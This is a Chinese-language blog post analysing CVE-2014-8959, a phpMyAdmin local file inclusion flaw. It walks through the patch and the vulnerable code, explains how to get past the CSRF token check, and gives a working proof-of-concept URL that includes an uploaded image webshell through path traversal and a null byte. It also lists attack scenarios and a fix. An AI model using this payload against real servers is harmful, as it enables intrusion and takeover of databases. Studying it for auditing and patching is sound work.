0x01 漏洞描述

phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。

最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下:

phpMyAdmin

4.0.1 – 4.0.10.6

4.1.1 – 4.1.14.7

4.2.1 – 4.2.12

0x02 补丁分析

看到bobao.360.cn上提到了这个漏洞,于是我写个小分析吧,给渗透正没思路的人一个思路,也给学习代码审计的朋友一点资料。

前几天phpmyadmin出了个新的补丁。

地址在此:http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php

修复了一个phpmyadmin4.x版本中的任意文件包含漏洞,我们看一下4.0版本的补丁:

https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5

在文件libraries/gis/pma_gis_factory.php中对$type_lower多加了个判断。由此我们可以猜测,文件包含的点就出在$type_lower这里。

0x03 漏洞代码分析

我们来到libraries/gis/pma_gis_factory.php 29行:

 public static function factory($type)

    {

        include_once './libraries/gis/pma_gis_geometry.php';

        $type_lower = strtolower($type);

        if (! file_exists('./libraries/gis/pma_gis_' . $type_lower . '.php')) {

            return false;

        }

        if (include_once './libraries/gis/pma_gis_' . $type_lower . '.php') {

            switch(strtoupper($type)) {

            case 'MULTIPOLYGON' :

                return PMA_GIS_Multipolygon::singleton();

            case 'POLYGON' :

                return PMA_GIS_Polygon::singleton();

            case 'MULTIPOINT' :

                return PMA_GIS_Multipoint::singleton();

            case 'POINT' :

                return PMA_GIS_Point::singleton();

            case 'MULTILINESTRING' :

                return PMA_GIS_Multilinestring::singleton();

            case 'LINESTRING' :

                return PMA_GIS_Linestring::singleton();

            case 'GEOMETRYCOLLECTION' :

                return PMA_GIS_Geometrycollection::singleton();

            default :

                return false;

            }

        } else {

            return false;

        }

}

将传入的参数$type转换小写以后赋值给$type_lower,直接拼接成路径进行include_once。

我们来搜一下factory这个函数:

很多地方在调用,但最直接的还是/gis_data_editor.php,进来看看:

// Get data if any posted

$gis_data = array();

if (PMA_isValid($_REQUEST['gis_data'], 'array')) {

    $gis_data = $_REQUEST['gis_data'];

}

$gis_types = array(

    'POINT',

    'MULTIPOINT',

    'LINESTRING',

    'MULTILINESTRING',

    'POLYGON',

    'MULTIPOLYGON',

    'GEOMETRYCOLLECTION'

);

// Extract type from the initial call and make sure that it's a valid one.

// Extract from field's values if availbale, if not use the column type passed.

if (! isset($gis_data['gis_type'])) {

    if (isset($_REQUEST['type']) && $_REQUEST['type'] != '') {

        $gis_data['gis_type'] = strtoupper($_REQUEST['type']);

    }

    if (isset($_REQUEST['value']) && trim($_REQUEST['value']) != '') {

        $start = (substr($_REQUEST['value'], 0, 1) == "'") ? 1 : 0;

        $gis_data['gis_type'] = substr(

            $_REQUEST['value'], $start, strpos($_REQUEST['value'], "(") - $start

        );

    }

    if ((! isset($gis_data['gis_type']))

        || (! in_array($gis_data['gis_type'], $gis_types))

    ) {

        $gis_data['gis_type'] = $gis_types[0];

    }

}

$geom_type = $gis_data['gis_type'];

// Generate parameters from value passed.

$gis_obj = PMA_GIS_Factory::factory($geom_type);

首先$gis_data = $_REQUEST[‘gis_data’];获取到gis_data,判断$gis_data[‘gis_type’]是否已经存在,如果存在则跳过那 一大串if子句。最后就将$gis_data[‘gis_type’];赋值给$geom_type,并传入 PMA_GIS_Factory::factory函数。

实际这个利用方法很简单,简单到其实就是获取$_REQUEST[‘gis_data’][‘gis_type’]并拼接到include_once中,造成任意文件包含。

0x04 利用过程及POC

那我们来说说利用。这个漏洞为何没火,因为在我看来他需要两个条件:

1.登录到phpmyadmin

2.需要截断

相对比较鸡肋。但实际上这两个条件也不难满足,很多时候我们通过任意文件可能能够获得某些数据库的访问权限,我们通过这个漏洞就能成功提权。

首先我的测试环境为php 5.2.17 + phpmyadmin 4.0.3 (想想我为什么选这样的环境)

创建一个普通用户test,没有任何权限,登录后只能看到test和information_schema表:

构造好URL直接访问(pma的上层目录放着一个包含phpinfo()的图片马u1.gif):

居然一片空白,没有出现我想要的phpinfo!?

这又涉及到phpmyadmin的一个防御CSRF机制了,来到libraries/common.inc.php 463行:

$token_mismatch = true;

if (PMA_isValid($_REQUEST['token'])) {

    $token_mismatch = ($_SESSION[' PMA_token '] != $_REQUEST['token']);

}

if ($token_mismatch) {

    /**

     *  List of parameters which are allowed from unsafe source

     */

    $allow_list = array(

        /* needed for direct access, see FAQ 1.34

         * also, server needed for cookie login screen (multi-server)

         */

        'server', 'db', 'table', 'target', 'lang',

        /* Session ID */

        'phpMyAdmin',

        /* Cookie preferences */

        'pma_lang', 'pma_collation_connection',

        /* Possible login form */

        'pma_servername', 'pma_username', 'pma_password',

        /* Needed to send the correct reply */

        'ajax_request',

        /* Permit to log out even if there is a token mismatch */

        'old_usr'

    );

    /**

     * Allow changing themes in test/theme.php

     */

    if (defined('PMA_TEST_THEME')) {

        $allow_list[] = 'set_theme';

    }

    /**

     * Require cleanup functions

     */

    include './libraries/cleanup.lib.php';

    /**

     * Do actual cleanup

     */

    PMA_remove_request_vars($allow_list);

}

他检查了$_SESSION[‘ PMA_token ‘] 是否等于 $_REQUEST[‘token’],如果不等于,最后会进入PMA_remove_request_vars函数,进去看看:

function PMA_remove_request_vars(&$whitelist)

{

    // do not check only $_REQUEST because it could have been overwritten

    // and use type casting because the variables could have become

    // strings

    $keys = array_keys(

        array_merge((array)$_REQUEST, (array)$_GET, (array)$_POST, (array)$_COOKIE)

    );

    foreach ($keys as $key) {

        if (! in_array($key, $whitelist)) {

            unset($_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);

        } else {

            // allowed stuff could be compromised so escape it

            // we require it to be a string

            if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {

                unset($_REQUEST[$key]);

            }

            if (isset($_POST[$key]) && ! is_string($_POST[$key])) {

                unset($_POST[$key]);

            }

            if (isset($_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {

                unset($_COOKIE[$key]);

            }

            if (isset($_GET[$key]) && ! is_string($_GET[$key])) {

                unset($_GET[$key]);

            }

        }

    }

}

实际上将所有GPCR都清空了,那么后面的操作肯定不能正常运转了。

所以,我们必须带上token访问。那又有同学要问了,token保存在session里,我又看不到session。

其实用phpmyadmin多的同学就应该注意到,一般我们访问pma的时候都会在url里看到token=xxx这个参数,我们只需要在正常访问的时候将这个token拷贝下来就可以了:

带上token访问即可getshell:

最终POC:

http://localhost/pma/gis_data_editor.php?token=0b21e4cff71e1df9f63c9c4952a8547f&gis_data[gis_type]=/../../../../u1.gif%00

Token=xxx,xxx是你的token,gis_data[gis_type]=yyy,yyy是你要包含的文件。最终拼接到include_once后面的参数是

./libraries/gis/pma_gis_/../../../../u1.gif

0x05 利用环境与鸡肋性

想想利用环境吧?

1.虚拟主机:大多虚拟主机面板都会提供给用户一个普通数据库账号和phpmyadmin,利用该账号登录,再通过包含进行getshell,获得面板权限。

2.文件读取/备份下载:读取到某些配置文件,获得了一个数据库账号,通过phpmyadmin进行getshell。

3.暴力破解:爆破出某些数据库用户,进入phpmyadmin拿shell。

当然利用环境还可能有很多,另外我们还可能会遇到“包含哪个文件”的问题,这个就只能靠大家见仁见智咯~

附:测试所使用的phpmyadmin 4.0.3:http://pan.baidu.com/s/1qWymmBE

0x06 修复建议

更新官方最新版本:http://sourceforge.net/projects/phpmyadmin/

参考链接:

http://www.91ri.org/11575.html

https://github.com/phpmyadmin/phpmyadmin/commit/2e3f0b9457b3c8f78beb864120bd9d55617a11b5

http://www.phpmyadmin.net/home_page/security/PMASA-2014-14.php

phpmyadmin任意文件包含漏洞分析(含演示)的更多相关文章

  1. [CVE-2014-8959] phpmyadmin任意文件包含漏洞分析

    0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发. 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: ...

  2. [WEB安全]phpMyadmin后台任意文件包含漏洞分析(CVE-2018-12613)

    0x00 简介 影响版本:4.8.0--4.8.1 本次实验采用版本:4.8.1 0x01 效果展示 payload: http://your-ip:8080/index.php?target=db_ ...

  3. phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞分析

    前言 影响版本:4.8.0--4.8.1 本次复现使用4.8.1     点击下载 复现平台为vulhub.此漏洞复现平台如何安装使用不在赘述.请自行百度. 漏洞复现 漏洞环境启动成功. 访问该漏洞地 ...

  4. ThinkCMF框架任意内容包含漏洞分析复现(写入shell+文件包哈)

    ThinkCMF框架任意内容包含漏洞分析复现 0x00 简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建.ThinkCMF提出灵活的应用 ...

  5. CVE-2018-12613phpMyAdmin 后台文件包含漏洞分析

    一.    漏洞背景 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库.借由此Web接口可以成 ...

  6. phpMyAdmin本地文件包含漏洞

    4 phpMyAdmin本地文件包含漏洞 4.1 摘要 4.1.1 漏洞简介 phpMyAdmin是一个web端通用MySQL管理工具,上述版本在/libraries/gis/pma_gis_fact ...

  7. ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现

    ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现 一.ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3. ...

  8. thinkphp 5.x~3.x 文件包含漏洞分析

    漏洞描述: ThinkPHP在加载模版解析变量时存在变量覆盖的问题,且没有对 $cacheFile 进行相应的消毒处理,导致模板文件的路径可以被覆盖,从而导致任意文件包含漏洞的发生. 主要还是变量覆盖 ...

  9. Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)

    不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻 ...

随机推荐

  1. 解决Eclipse建Maven项目module无法转换为2.3

    Maven项目在Project Facets里面修改Dynamic web module为2.3的时候就会出现Cannot change version of project facet Dynami ...

  2. RTTI (Run-Time Type Identification,通过运行时类型识别) 转

    参考一: RTTI(Run-Time Type Identification,通过运行时类型识别)程序能够使用基类的指针或引用来检查这些指针或引用所指的对象的实际派生类型.   RTTI提供了以下两个 ...

  3. Spring的LoadTimeWeaver(代码织入)

    在Java 语言中,从织入切面的方式上来看,存在三种织入方式:编译期织入.类加载期织入和运行期织入.编译期织入是指在Java编译期,采用特殊的编译器,将切面织入到Java类中:而类加载期织入则指通过特 ...

  4. UVA 11475 后缀数组/KMP

    题目链接: 题意:给定一个只含字母的字符串,求在字符串末尾添加尽量少的字符使得字符串为回文串. 思路:因为只能从末尾添加字符,所以其实求的是最长的后缀回文串.那么添加的字符为除了这个原串的最长后缀回文 ...

  5. RedHat5.1下安装Seismic Unix44R1

    以前安装过好几次,在这里总结下.不足之处,欢迎批评指正. 用su44用户登录,修改环境变量(~/.bash_profile文件中添加) export CWPROOT=/home/`whoami`/cw ...

  6. git学习 git-flow

    例子 初始化 在git init之后执行git init flow;接下来的命名约定建议使用默认值; 新特性 为即将发布的版本开发新功能特性. 这通常只存在开发者的库中. 增加新特性 git flow ...

  7. 浩瀚移动POS收银开单扫描解决方案PDA仓储系统,无线批发,移动批发,无线POS,无线销售APP-车销管理PDA

    适用范围 各种业态的批发商铺.批发市场.订货会.展销会.配送中心仓库…… 产品简介 随着移动技术与智能PDA设备的迅猛发展,中国已经跨步进入移动信息化社会.移动商务是移动信息社会的重要载体与形式,它开 ...

  8. 20145223《Java程序设计》实验报告3

    20145223 实验三<敏捷开发与XP实践> 实验内容 使用git上传代码 使用git相互更改代码 实验步骤: 一.使用git上传代码 $ git push 1.找到需要push的文件所 ...

  9. javaScript入门第一天

    JavaScript提供七种不同的data types(数据类型),它们是undefined(未定义), null(空), boolean(布尔型), string(字符串), symbol(符号), ...

  10. BZOJ4171 : Rhl的游戏

    把第一行每个位置设成未知量,对于之后每一行,都可以用第一行的未知量线性表示. 那么只需要加上最后一行的$m$个方程,对于不能按的那$k$个位置也列出对应的方程. 用高斯消元判断是否有解即可,时间复杂度 ...